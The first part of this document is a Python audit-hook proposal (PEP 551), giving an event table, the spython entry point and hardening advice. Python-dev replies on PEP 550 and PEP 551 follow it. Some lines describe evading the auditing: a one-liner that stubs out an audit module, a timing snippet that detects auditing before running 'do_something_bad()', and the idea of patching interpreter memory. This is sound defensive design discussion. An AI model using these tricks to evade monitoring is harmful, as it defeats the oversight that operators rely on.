"``(code_object,)``", "Detect dynamic execution of code objects. This only occurs for explicit calls, and is not raised for normal function invocation." ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path, sys.path_hooks)``", "Detect when modules are imported. This is raised before the module name is resolved to a file. All arguments other than the module name may be ``None`` if they are not used or available." ``code_new``, ``code.__new__``, "``(bytecode, filename, name)``", "Detect dynamic creation of code objects. This only occurs for direct instantiation, and is not raised for normal compilation." "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, " ``(module_or_path,)``", "Detect when native modules are used." ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "Collect information about specific symbols retrieved from native modules." ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect when code is accessing arbitrary memory using ``ctypes``" ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing the id of objects, which in CPython reveals information about memory layout." 
``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect when code is accessing frames directly" ``sys._current_frames``, ``sys._current_frames``, "", "Detect when code is accessing frames directly" ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is injecting trace functions. Because of the implementation, exceptions raised from the hook will abort the operation, but will not be raised in Python code. Note that ``threading.setprofile`` eventually calls this function, so the event will be audited for each thread." ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is injecting trace functions. Because of the implementation, exceptions raised from the hook will abort the operation, but will not be raised in Python code. Note that ``threading.settrace`` eventually calls this function, so the event will be audited for each thread." ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", " Detect changes to async generator hooks." ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", " Detect changes to async generator hooks." ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "", "Detect changes to the coroutine wrapper." ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, "``(new_limit,)``", " Detect changes to the recursion limit." ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``, "``(interval_us,)`` ", "Detect changes to the switching interval." "``socket.bind``, ``socket.connect``, ``socket.connect_ex``, ``socket.getaddrinfo``, ``socket.getnameinfo``, ``socket.sendmsg``, ``socket.sendto``", ``socket.address``, "``(address,)``", "Detect access to network resources. The address is unmodified from the original call." ``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect creation of sockets. The arguments will be int values." ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to retrieve the current host name." ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect attempts to change the current host name. The name argument is passed as a bytes object." "``socket.gethostbyname``, ``socket.gethostbyname_ex``", " ``socket.gethostbyname``", "``(name,)``", "Detect host name resolution. The name argument is a str or bytes object." ``socket.gethostbyaddr``, ``socket.gethostbyaddr``, "``(address,)``", "Detect host resolution. The address argument is a str or bytes object." ``socket.getservbyname``, ``socket.getservbyname``, "``(name, protocol)``", " Detect service resolution. The arguments are str objects." ``socket.getservbyport``, ``socket.getservbyport``, "``(port, protocol)``", " Detect service resolution. The port argument is an int and protocol is a str." "," ``type.__setattr__``","``(type, attr_name, value)``","Detect monkey patching of types. This event is only raised when the object is an instance of ``type``." "``_PyObject_GenericSetAttr``, ``check_set_special_type_attr``, ``object_set_class``",``object.__setattr__``,"``(object, attr, value)``"," Detect monkey patching of objects. This event is raised for the ``__class__`` attribute and any attribute on ``type`` objects." ``_PyObject_GenericSetAttr``,``object.__delattr__``,"``(object, attr)``"," Detect deletion of object attributes. This event is raised for any attribute on ``type`` objects." ``Unpickler.find_class``,``pickle.find_class``,"``(module_name, global_name)``","Detect imports and global name lookup when unpickling." TODO - more hooks in ``_socket``, ``_ssl``, others? 
* code objects * function objects SPython Entry Point =================== A new entry point binary will be added, called ``spython.exe`` on Windows and ``spythonX.Y`` on other platforms. This entry point is intended primarily as an example, as we expect most users of this functionality to implement their own entry point and hooks (see `Recommendations`_). It will also be used for tests. Source builds will build ``spython`` by default, but distributions should not include it except as a test binary. The python.org managed binary distributions will not include ``spython``. **Do not accept most command-line arguments** The ``spython`` entry point requires a script file be passed as the first argument, and does not allow any options. This prevents arbitrary code execution from in-memory data or non-script files (such as pickles, which can be executed using ``-m pickle ``. Options ``-B`` (do not write bytecode), ``-E`` (ignore environment variables) and ``-s`` (no user site) are assumed. If a file with the same full path as the process with a ``._pth`` suffix (``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it will be used to initialize ``sys.path`` following the rules currently described `for Windows `_. When built with ``Py_DEBUG``, the ``spython`` entry point will allow a ``-i`` option with no other arguments to enter into interactive mode, with audit messages being written to standard error rather than a file. This is intended for testing and debugging only. **Log security events to a file** Before initialization, ``spython`` will set an audit hook that writes events to a local file. By default, this file is the full path of the process with a ``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment variable (despite such overrides being explicitly discouraged in `Recommendations`_). The audit hook will also abort all ``sys.addaudithook`` events, preventing any other hooks from being added. **Restrict importable modules** Also before initialization, ``spython`` will set an open-for-execute hook that validates all files opened with ``os.open_for_exec``. This implementation will require all files to have a ``.py`` suffix (thereby blocking the use of cached bytecode), and will raise a custom audit event ``spython.open_for_exec`` containing ``(filename, True_if_allowed)``. On Windows, the hook will also open the file with flags that prevent any other process from opening it with write access, which allows the hook to perform additional validation on the contents with confidence that it will not be modified between the check and use. Compilation will later trigger a ``compile`` event, so there is no need to read the contents now for AMSI, but other validation mechanisms such as DeviceGuard [4]_ should be performed here. **Restrict globals in pickles** The ``spython`` entry point will abort all ``pickle.find_class`` events that use the default implementation. Overrides will not raise audit events unless explicitly added, and so they will continue to be allowed. Performance Impact ================== **TODO** Full impact analysis still requires investigation. Preliminary testing shows that calling ``sys.audit`` with no hooks added does not significantly affect any existing benchmarks, though targeted microbenchmarks can observe an impact. Performance impact using ``spython`` or with hooks added are not of interest here, since this is considered opt-in functionality. 
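As a rough sketch of how the preliminary claim above could be checked, the
following snippet uses ``sys.audit`` and ``sys.addaudithook`` exactly as
specified in this PEP (the event name and iteration count are illustrative
only)::

    import sys
    import timeit

    # Cost of raising an event that no hook is listening for (the
    # common case on machines without auditing enabled).
    print(timeit.timeit(lambda: sys.audit("x.event", 1), number=100000))

    def hook(event, args):
        pass                    # hook receives (event_name, args_tuple)

    sys.addaudithook(hook)      # itself raises the 'sys.addaudithook' event

    # Cost once a do-nothing hook is installed (the opt-in case).
    print(timeit.timeit(lambda: sys.audit("x.event", 1), number=100000))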
**Restrict globals in pickles**

The ``spython`` entry point will abort all ``pickle.find_class`` events
that use the default implementation. Overrides will not raise audit events
unless explicitly added, and so they will continue to be allowed.

Performance Impact
==================

**TODO** Full impact analysis still requires investigation. Preliminary
testing shows that calling ``sys.audit`` with no hooks added does not
significantly affect any existing benchmarks, though targeted
microbenchmarks can observe an impact.

Performance impact using ``spython`` or with hooks added is not of interest
here, since this is considered opt-in functionality.
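The no-hook overhead can be estimated with a microbenchmark such as the
following (assuming a build where the proposed ``sys.audit`` exists;
absolute numbers will vary by machine)::

    import timeit

    # One million no-op audit calls with no hooks installed.
    print(timeit.timeit("sys.audit('test.event')",
                        setup="import sys",
                        number=1_000_000))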
Recommendations
===============

Specific recommendations are difficult to make, as the ideal configuration
for any environment will depend on the user's ability to manage, monitor,
and respond to activity on their own network. However, many of the
proposals here do not appear to be of value without deeper illustration.
This section provides recommendations using the terms **should** (or
**should not**), indicating that we consider it dangerous to ignore the
advice, and **may**, indicating that the advice ought to be considered for
high value systems. The term **sysadmins** refers to whoever is responsible
for deploying Python throughout your network; different organizations may
have an alternative title for the responsible people.

Sysadmins **should** build their own entry point, likely starting from the
``spython`` source, and directly interface with the security systems
available in their environment. The more tightly integrated, the less
likely a vulnerability will be found allowing an attacker to bypass those
systems. In particular, the entry point **should not** obtain any settings
from the current environment, such as environment variables, unless those
settings are otherwise protected from modification.

Audit messages **should not** be written to a local file. The ``spython``
entry point does this for example and testing purposes. On production
machines, tools such as ETW [7]_ or auditd [12]_ that are intended for this
purpose should be used.

The default ``python`` entry point **should not** be deployed to production
machines, but could be given to developers to use and test Python on
non-production machines. Sysadmins **may** consider deploying a less
restrictive version of their entry point to developer machines, since any
system connected to your network is a potential target. Sysadmins **may**
deploy their own entry point as ``python`` to obscure the fact that extra
auditing is being included.

Python deployments **should** be made read-only using any available
platform functionality after deployment and during use.

On platforms that support it, sysadmins **should** include signatures for
every file in a Python deployment, ideally verified using a private
certificate. For example, Windows supports embedding signatures in
executable files and using catalogs for others, and can use DeviceGuard
[4]_ to validate signatures either automatically or using an
``open_for_exec`` hook.

Sysadmins **should** log as many audited events as possible, and
**should** copy logs off of local machines frequently. Even if logs are not
being constantly monitored for suspicious activity, once an attack is
detected it is too late to enable auditing. Audit hooks **should not**
attempt to preemptively filter events, as even benign events are useful
when analyzing the progress of an attack. (Watch the "No Easy Breach" video
under `Further Reading`_ for a deeper look at this side of things.)

Most actions **should not** be aborted if they could ever occur during
normal use or if preventing them will encourage attackers to work around
them. As described earlier, awareness is a higher priority than prevention.
Sysadmins **may** audit their Python code and abort operations that are
known to never be used deliberately.

Audit hooks **should** write events to logs before attempting to abort. As
discussed earlier, it is more important to record malicious actions than to
prevent them.

Sysadmins **should** identify correlations between events, as a change to
correlated events may indicate misuse. For example, module imports will
typically trigger the ``import`` auditing event, followed by an
``open_for_exec`` call and usually a ``compile`` event. Attempts to bypass
auditing will often suppress some but not all of these events. So if the
log contains ``import`` events but not ``compile`` events, investigation
may be necessary (a small sketch of such a check follows this section).

The first audit hook **should** be set in C code before ``Py_Initialize``
is called, and that hook **should** unconditionally abort the
``sys.addaudithook`` event. The Python interface is primarily intended for
testing and development. To prevent audit hooks being added on
non-production machines, an entry point **may** add an audit hook that
aborts the ``sys.addaudithook`` event but otherwise does nothing.

On production machines, a non-validating ``open_for_exec`` hook **may** be
set in C code before ``Py_Initialize`` is called. This prevents later code
from overriding the hook; however, logging the
``setopenforexecutehandler`` event is still useful, since no code should
ever need to call it. Using at least the sample ``open_for_exec`` hook
implementation from ``spython`` is recommended.

Since ``importlib``'s use of ``open_for_exec`` may be easily bypassed with
monkeypatching, an audit hook **should** be used to detect attribute
changes on type objects.

[TODO: more good advice; less bad advice]
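As a sketch of the correlation check described above, using an invented
in-memory log format purely for illustration (real deployments would read
ETW or auditd output)::

    # Each entry is (event, detail) as written by an audit hook.
    log = [
        ('import', 'helper'),
        ('compile', 'helper.py'),
        ('import', 'suspicious'),  # no matching compile event below
    ]

    imported = {detail for event, detail in log if event == 'import'}
    compiled = {detail.rsplit('.', 1)[0] for event, detail in log
                if event == 'compile'}

    for name in imported - compiled:
        print('investigate:', name, 'imported without a compile event')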
Rejected Ideas
==============

Separate module for audit hooks
-------------------------------

The proposal is to add a new module for audit hooks, hypothetically
``audit``. This would separate the API and implementation from the ``sys``
module, and allow naming the C functions ``PyAudit_AddHook`` and
``PyAudit_Audit`` rather than the current variations.

Any such module would need to be a built-in module that is guaranteed to
always be present. The nature of these hooks is that they must be callable
without condition, as any conditional imports or calls provide more
opportunities to intercept and suppress or modify events.

Given its nature as one of the most core modules, the ``sys`` module is
somewhat protected against module shadowing attacks. Replacing ``sys`` with
a sufficiently functional module that the application can still run is a
much more complicated task than replacing a module with only one function
of interest. An attacker that has the ability to shadow the ``sys`` module
is already capable of running arbitrary code from files, whereas an
``audit`` module can be replaced with a single statement::

    import sys; sys.modules['audit'] = type('audit', (object,), {'audit': lambda *a: None, 'addhook': lambda *a: None})

Multiple layers of protection already exist for monkey patching attacks
against either ``sys`` or ``audit``, but assignments or insertions to
``sys.modules`` are not audited.

This idea is rejected because it makes substituting ``audit`` calls
throughout all callers near trivial.

Flag in sys.flags to indicate "secure" mode
-------------------------------------------

The proposal is to add a value in ``sys.flags`` to indicate when Python is
running in a "secure" mode. This would allow applications to detect when
some features are enabled and modify their behaviour appropriately.

Currently there are no guarantees made about security by this PEP - this
section is the first time the word "secure" has been used. Security
**transparency** does not result in any changed behaviour, so there is no
appropriate reason for applications to modify their behaviour.

Both application-level APIs ``sys.audit`` and ``os.open_for_exec`` are
always present and functional, regardless of whether the regular ``python``
entry point or some alternative entry point is used. Callers cannot
determine whether any hooks have been added (except by performing
side-channel analysis), nor do they need to. The calls should be fast
enough that callers do not need to avoid them, and the sysadmin is
responsible for ensuring their added hooks are fast enough to not affect
application performance.

The argument that this is "security by obscurity" is valid, but irrelevant.
Security by obscurity is only an issue when there are no other protective
mechanisms; obscurity as the first step in avoiding attack is strongly
recommended (see `this article `_ for discussion).

This idea is rejected because there are no appropriate reasons for an
application to change its behaviour based on whether these APIs are in use.

Further Reading
===============

**Redefining Malware: When Old Terms Pose New Threats**
   By Aviv Raff for SecurityWeek, 29th January 2014

   This article, and those linked by it, are high-level summaries of the
   rise of APTs and the differences from "traditional" malware.

   ``_

**Anatomy of a Cyber Attack**
   By FireEye, accessed 23rd August 2017

   A summary of the techniques used by APTs, and links to a number of
   relevant whitepapers.

   ``_

**Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection**
   By Aviv Raff for SecurityWeek, 8th May 2014

   High-level summary of the value of detailed logging and automatic
   analysis.

   ``_

**No Easy Breach: Challenges and Lessons Learned from an Epic Investigation**
   Video presented by Matt Dunwoody and Nick Carr for Mandiant at ShmooCon
   2016

   Detailed walkthrough of the processes and tools used in detecting and
   removing an APT.

   ``_

**Disrupting Nation State Hackers**
   Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

   Good security practices, capabilities and recommendations from the chief
   of NSA's Tailored Access Operations.

   ``_

References
==========

.. [1] Assume Breach Mindset, ``_

.. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
   Protection Advances in Windows 10, ``_

.. [3] ``_

.. [4] ``_

.. [5] AMSI, ``_

.. [6] Persistent Zone Identifiers, ``_

.. [7] Event tracing, ``_

.. [8] ``_

.. [9] ``_

.. [10] ``_

.. [11] ``_

.. [12] ``_

.. [13] SELinux access decisions, ``_

Acknowledgments
===============

Thanks to all the people from Microsoft involved in helping make the Python
runtime safer for production use, and especially to James Powell for doing
much of the initial research, analysis and implementation, Lee Holmes for
invaluable insights into the info-sec field and PowerShell's responses, and
Brett Cannon for the grounding discussions.

Copyright
=========

Copyright (c) 2017 by Microsoft Corporation. This material may be
distributed only subject to the terms and conditions set forth in the Open
Publication License, v1.0 or later (the latest version is presently
available at http://www.opencontent.org/openpub/).
From njs at pobox.com Mon Aug 28 21:07:44 2017 From: njs at pobox.com (Nathaniel Smith) Date: Mon, 28 Aug 2017 18:07:44 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Mon, Aug 28, 2017 at 3:14 PM, Eric Snow wrote: > On Sat, Aug 26, 2017 at 3:09 PM, Nathaniel Smith wrote: >> You might be interested in these notes I wrote to motivate why we need >> a chain of namespaces, and why simple "async task locals" aren't >> sufficient: >> >> https://github.com/njsmith/pep-550-notes/blob/master/dynamic-scope.ipynb > > Thanks, Nathaniel! That helped me understand the rationale, though > I'm still unconvinced chained lookup is necessary for the stated goal > of the PEP. > > (The rest of my reply is not specific to Nathaniel.) > > tl;dr Please: > * make the chained lookup aspect of the proposal more explicit (and > distinct) in the beginning sections of the PEP (or drop chained > lookup). > * explain why normal frames do not get to take advantage of chained > lookup (or allow them to). > > -------------------- > > If I understood right, the problem is that we always want context vars > resolved relative to the current frame and then to the caller's frame > (and on up the call stack). For generators, "caller" means the frame > that resumed the generator. Since we don't know what frame will > resume the generator beforehand, we can't simply copy the current LC > when a generator is created and bind it to the generator's frame. > > However, I'm still not convinced that's the semantics we need. The > key statement is "and then to the caller's frame (and on up the call > stack)", i.e. chained lookup. On the linked page Nathaniel explained > the position (quite clearly, thank you) using sys.exc_info() as an > example of async-local state. I posit that that example isn't > particularly representative of what we actually need. Isn't the point > of the PEP to provide an async-safe alternative to threading.local()? > > Any existing code using threading.local() would not expect any kind of > chained lookup since threads don't have any. So introducing chained > lookup in the PEP is unnecessary and consequently not ideal since it > introduces significant complexity. There's a lot of Python code out there, and it's hard to know what it all wants :-). But I don't think we should get hung up on matching threading.local() -- no-one sits down and says "okay, what my users want is for me to write some code that uses a thread-local", i.e., threading.local() is a mechanism, not an end-goal. My hypothesis is in most cases, when people reach for threading.local(), it's because they have some "contextual" variable, and they want to be able to do things like set it to a value that affects all and only the code that runs inside a 'with' block. So far the only way to approximate this in Python has been to use threading.local(), but chained lookup would work even better. As evidence for this hypothesis: something like chained lookup is important for exc_info() [1] and for Trio's cancellation semantics, and I'm pretty confident that it's what users naturally expect for use cases like 'with decimal.localcontext(): ...' or 'with numpy.errstate(...): ...'. And it works fine for cases like Flask's request-locals that get set once near the top of a callstack and then treated as read-only by most of the code. I'm not aware of any alternative to chained lookup that fulfills all of these use cases -- are you? 
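(To make "chained lookup" concrete, here's a toy model built on
collections.ChainMap -- just an illustration of the lookup rule, not the
PEP 550 API, and all the names here are invented:

    from collections import ChainMap

    context = ChainMap({'decimal_prec': 28})   # outer logical context

    def pushed(**overrides):
        # A child context: lookups fall back to the parent chain.
        return context.new_child(overrides)

    inner = pushed(decimal_prec=4)
    print(inner['decimal_prec'])    # 4  -- set in the child
    print(context['decimal_prec'])  # 28 -- outer context unaffected

The 'with decimal.localcontext()' pattern is the push; leaving the block
is the pop.)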
And I'm not aware of any use cases that require something more than threading.local() but less than chained lookup -- are you? [1] I guess I should say something about including sys.exc_info() as evidence that chained lookup as useful, given that CPython probably won't share code between it's PEP 550 implementation and its sys.exc_info() implementation. I'm mostly citing it as a evidence that this is a real kind of need that can arise when writing programs -- if it happens once, it'll probably happen again. But I can also imagine that other implementations might want to share code here, and it's certainly nice if the Python-the-language spec can just say "exc_info() has semantics 'as if' it were implemented using PEP 550 storage" and leave it at that. Plus it's kind of rude for the interpreter to claim semantics for itself that it won't let anyone else implement :-). > As the PEP is currently written, chained lookup is a key part of the > proposal, though it does not explicitly express this. I suppose this > is where my confusion has been. > > At this point I think I understand one rationale for the chained > lookup functionality; it takes advantage of the cooperative scheduling > characteristics of generators, et al. Unlike with threads, a > programmer can know the context under which a generator will be > resumed. Thus it may be useful to the programmer to allow (or expect) > the resumed generator to fall back to the calling context. However, > given the extra complexity involved, is there enough evidence that > such capability is sufficiently useful? Could chained lookup be > addressed separately (in another PEP)? > > Also, wouldn't it be equally useful to support chained lookup for > function calls? Programmers have the same level of knowledge about > the context stack with function calls as with generators. I would > expect evidence in favor of chained lookups for generators to also > favor the same for normal function calls. The important difference between generators/coroutines and normal function calls is that with normal function calls, the link between the caller and callee is fixed for the entire lifetime of the inner frame, so there's no way for the context to shift under your feet. If all we had were normal function calls, then (green-) thread locals using the save/restore trick would be enough to handle all the use cases above -- it's only for generators/coroutines where the save/restore trick breaks down. This means that pushing/popping LCs when crossing into/out of a generator frame is the minimum needed to get the desired semantics, and it keeps the LC stack small (important since lookups can be O(n) in the worst case), and it minimizes the backcompat breakage for operations like decimal.setcontext() where people *do* expect to call it in a subroutine and have the effects be visible in the caller. -n -- Nathaniel J. Smith -- https://vorpus.org From steve at pearwood.info Mon Aug 28 21:15:44 2017 From: steve at pearwood.info (Steven D'Aprano) Date: Tue, 29 Aug 2017 11:15:44 +1000 Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime In-Reply-To: References: Message-ID: <20170829011544.GE9671@ando.pearwood.info> Very nicely written. A few comments below. On Mon, Aug 28, 2017 at 04:55:19PM -0700, Steve Dower wrote: [...] > This PEP describes additions to the Python API and specific behaviors > for the > CPython implementation that make actions taken by the Python runtime > visible to > security and auditing tools. 
The goals in order of increasing importance
[...]

Check your line lengths, I think they may be too long? (Or maybe my mail
client is set too short?)

[...]
> To summarize, defenders have a need to audit specific uses of Python in
> order to detect abnormal or malicious usage. Currently, the Python
> runtime does not provide any ability to do this, which (anecdotally) has
> led to organizations switching to other languages.

It would help if the PEP addressed the state of the art in other languages.

[...]
> For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but
> may do nothing. This allows code to make calls to ``sys.audit()``
> without having to test for existence, but it should not assume that its
> call will have any effect. (Including existence tests in
> security-critical code allows another vector to bypass auditing, so it
> is preferable that the function always exist.)

That suggests a timing attack to infer the existence of auditing.
A naive attempt:

    from time import time
    f = lambda: None
    t = time()
    f()
    time_to_do_nothing = time() - t
    audit = sys.audit
    t = time()
    audit()
    time_to_do_audit = time() - t
    if time_to_do_audit <= time_to_do_nothing:
        do_something_bad()

This is probably too naive to work in real code, but the point is that the
attacker may be able to exploit timing differences in sys.audit and
related functions to infer whether or not auditing is enabled.

-- 
Steve

From greg at krypto.org Mon Aug 28 21:34:29 2017
From: greg at krypto.org (Gregory P. Smith)
Date: Tue, 29 Aug 2017 01:34:29 +0000
Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime
In-Reply-To: <20170829011544.GE9671@ando.pearwood.info>
References: <20170829011544.GE9671@ando.pearwood.info>
Message-ID: 

My gut feeling says that there are N interpreters available on just about
every bloated system image out there. Multiple pythons are often among
them, and others we do not control will also continue to exist. I expect a
small initial payload can be created that when executed will binary patch
the interpreter's memory to disable all auditing, *potentially* in a
manner that cannot be audited itself (a challenge guaranteed to be
accepted).

If the goal is to audit attacks, and the above becomes the standard attack
payload boilerplate before the existing "use python to pull down 'fun'
stuff to execute", it seems to negate the usefulness.

This audit layer seems like a defense against existing exploit kits rather
than future ones. Is that still useful from a defense in depth point of
view?

-gps

On Mon, Aug 28, 2017 at 6:24 PM Steven D'Aprano wrote:

> Very nicely written. A few comments below.
>
> On Mon, Aug 28, 2017 at 04:55:19PM -0700, Steve Dower wrote:
>
> [...]
> > This PEP describes additions to the Python API and specific behaviors
> > for the CPython implementation that make actions taken by the Python
> > runtime visible to security and auditing tools. The goals in order of
> > increasing importance
> [...]
>
> Check your line lengths, I think they may be too long? (Or maybe my mail
> client is set too short?)
>
> [...]
> > To summarize, defenders have a need to audit specific uses of Python
> > in order to detect abnormal or malicious usage. Currently, the Python
> > runtime does not provide any ability to do this, which (anecdotally)
> > has led to organizations switching to other languages.
>
> It would help if the PEP addressed the state of the art in other
> languages.
>
> [...]
> > For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but > > may do > > nothing. This allows code to make calls to ``sys.audit()`` without > having to > > test for existence, but it should not assume that its call will have any > > effect. > > (Including existence tests in security-critical code allows another > > vector to > > bypass auditing, so it is preferable that the function always exist.) > > That suggests a timing attack to infer the existence of auditing. > A naive attempt: > > from time import time > f = lambda: None > t = time() > f() > time_to_do_nothing = time() - t > audit = sys.audit > t = time() > audit() > time_to_do_audit = time() - t > if time_to_do_audit <= time_to_do_nothing: > do_something_bad() > > > This is probably too naive to work in real code, but the point is that > the attacker may be able to exploit timing differences in sys.audit and > related functions to infer whether or not auditing is enabled. > > > > -- > Steve > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org > -------------- next part -------------- An HTML attachment was scrubbed... URL: From guido at python.org Mon Aug 28 21:50:17 2017 From: guido at python.org (Guido van Rossum) Date: Mon, 28 Aug 2017 18:50:17 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Mon, Aug 28, 2017 at 6:07 PM, Nathaniel Smith wrote: > The important difference between generators/coroutines and normal > function calls is that with normal function calls, the link between > the caller and callee is fixed for the entire lifetime of the inner > frame, so there's no way for the context to shift under your feet. If > all we had were normal function calls, then (green-) thread locals > using the save/restore trick would be enough to handle all the use > cases above -- it's only for generators/coroutines where the > save/restore trick breaks down. This means that pushing/popping LCs > when crossing into/out of a generator frame is the minimum needed to > get the desired semantics, and it keeps the LC stack small (important > since lookups can be O(n) in the worst case), and it minimizes the > backcompat breakage for operations like decimal.setcontext() where > people *do* expect to call it in a subroutine and have the effects be > visible in the caller. > I like this way of looking at things. Does this have any bearing on asyncio.Task? To me those look more like threads than like generators. Or possibly they should inherit the lookup chain from the point when the Task was created, but not be affected at all by the lookup chain in place when they are executed. FWIW we *could* have a policy that OS threads also inherit the lookup chain from their creator, but I doubt that's going to fly with backwards compatibility. I guess my general (hurried, sorry) view is that we're at a good point where we have a small number of mechanisms but are still debating policies on how those mechanisms should be used. (The basic mechanism is chained lookup and the policies are about how the chains are fit together for various language/library constructs.) -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From steve.dower at python.org Mon Aug 28 22:23:11 2017 From: steve.dower at python.org (Steve Dower) Date: Mon, 28 Aug 2017 19:23:11 -0700 Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime In-Reply-To: <20170829011544.GE9671@ando.pearwood.info> References: <20170829011544.GE9671@ando.pearwood.info> Message-ID: On 28Aug2017 1815, Steven D'Aprano wrote: > Very nicely written. A few comments below. > > On Mon, Aug 28, 2017 at 04:55:19PM -0700, Steve Dower wrote: > > [...] >> This PEP describes additions to the Python API and specific behaviors >> for the >> CPython implementation that make actions taken by the Python runtime >> visible to >> security and auditing tools. The goals in order of increasing importance > [...] > > Check your line lengths, I think they may be too long? (Or maybe my mail > client is set too short?) Yeah, not sure what's happened here. Are PEPs supposed to be 80? Or 72? > [...] >> To summarize, defenders have a need to audit specific uses of Python in >> order to >> detect abnormal or malicious usage. Currently, the Python runtime does not >> provide any ability to do this, which (anecdotally) has led to organizations >> switching to other languages. > > It would help if the PEP addressed the state of the art in other > languages. It briefly mentions that PowerShell has integrated similar functionality (generally more invasive, but it's not meant as a full application language). As far as I know, no other languages have done anything at this level - OS-level scripting (WSH, AppleScript) rely on OS-level auditing and don't try to do it within the language. This makes sense from the point of view of "my system made a network connection to x.y.z.w", but doesn't provide the correlating information necessary to see "this Python code downloaded from x.com made a network connection to ...". > [...] >> For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but >> may do >> nothing. This allows code to make calls to ``sys.audit()`` without having to >> test for existence, but it should not assume that its call will have any >> effect. >> (Including existence tests in security-critical code allows another >> vector to >> bypass auditing, so it is preferable that the function always exist.) > > That suggests a timing attack to infer the existence of auditing. > A naive attempt: > [...] > This is probably too naive to work in real code, but the point is that > the attacker may be able to exploit timing differences in sys.audit and > related functions to infer whether or not auditing is enabled. I mention later that timing attacks are possible to determine whether events are being audited. I'm not convinced that provides any usable information though - by the time you can test that you are being tracked, you've (a) already got arbitrary code executing, and (b) have already been caught :) (or at least triggered an event somewhere... may not have flagged any alerts yet, but there's a record) Cheers, Steve From rosuav at gmail.com Mon Aug 28 22:26:58 2017 From: rosuav at gmail.com (Chris Angelico) Date: Tue, 29 Aug 2017 12:26:58 +1000 Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime In-Reply-To: References: <20170829011544.GE9671@ando.pearwood.info> Message-ID: On Tue, Aug 29, 2017 at 12:23 PM, Steve Dower wrote: >> Check your line lengths, I think they may be too long? (Or maybe my mail >> client is set too short?) > > > Yeah, not sure what's happened here. Are PEPs supposed to be 80? Or 72? 
According to the emacs stanza at the end, 70. I don't know of any non-emacs editors that respect that, though. ChrisA From steve.dower at python.org Mon Aug 28 22:31:22 2017 From: steve.dower at python.org (Steve Dower) Date: Mon, 28 Aug 2017 19:31:22 -0700 Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime In-Reply-To: References: <20170829011544.GE9671@ando.pearwood.info> Message-ID: <44befa5d-df9a-6c12-0bd4-baeb26888bff@python.org> On 28Aug2017 1834, Gregory P. Smith wrote: > My gut feeling says that there are N interpreters available on just > about every bloated system image out there. Multiple pythons are often > among them, other we do not control will also continue to exist. I > expect a small initial payload can be created that when executed will > binary patch the interpreter's memory to disable all auditing, > /potentially/ in a manner that cannot be audited itself (a challenge > guaranteed to be accepted). Repeating the three main goals listed by the PEP: * preventing malicious use is valuable * detecting malicious use is important * detecting attempts to bypass detection is critical This case falls under the last one. Yes, it is possible to patch the interpreter (at least in systems that don't block that - Windows certainly can prevent this at the kernel level), but in order to do so you should trigger at least one very unusual event (e.g. any of the ctypes ones). Compared to the current state, where someone can patch your interpreter without you ever being able to tell, it counts as a victory. And yeah, if you have alternative interpreters out there that are not auditing, you're in just as much trouble. There are certainly sysadmins who do a good job of controlling this though - these changes enable *those* sysadmins to do a better job, it doesn't help the ones who don't invest in it. > If the goal is to audit attacks and the above becomes the standard > attack payload boilerplate before existing "use python to pull down > 'fun' stuff to execute". It seems to negate the usefulness. You can audit all code before it executes and prevent it. Whether you use a local malware scanner or some sort of signature scan of log files doesn't matter, the change *enables* you to detect this behaviour. Right now it is impossible. > This audit layer seems like a defense against existing exploit kits > rather than future ones. As a *defense*, yes, though if you use a safelist of your own code rather than a blocklist of malicious code, you can defend against all unexpected code. (For example, you could have a signed catalog of code on the machine that is used to verify all sources that are executed. Again - these features are for sysadmins who invest in this, it isn't free security for lazy ones.) > Is that still useful from a defense in depth > point of view? Detection is very useful for defense in depth. The new direction of malware scanners is heading towards behavioural detection (away from signature-based detection) because it's more future proof to detect unexpected actions than unexpected code. (If you think any of these explanations deserve to be in the PEP text itself, please let me know so I can add it in. Or if you don't like them, let me know that too and I'll try again!) 
Cheers,
Steve

From steve.dower at python.org Mon Aug 28 22:45:58 2017
From: steve.dower at python.org (Steve Dower)
Date: Mon, 28 Aug 2017 19:45:58 -0700
Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime
In-Reply-To: 
References: <20170829011544.GE9671@ando.pearwood.info> 
Message-ID: 

On 28Aug2017 1926, Chris Angelico wrote:
> On Tue, Aug 29, 2017 at 12:23 PM, Steve Dower wrote:
>>> Check your line lengths, I think they may be too long? (Or maybe my
>>> mail client is set too short?)
>>
>> Yeah, not sure what's happened here. Are PEPs supposed to be 80? Or 72?
>
> According to the emacs stanza at the end, 70. I don't know of any
> non-emacs editors that respect that, though.

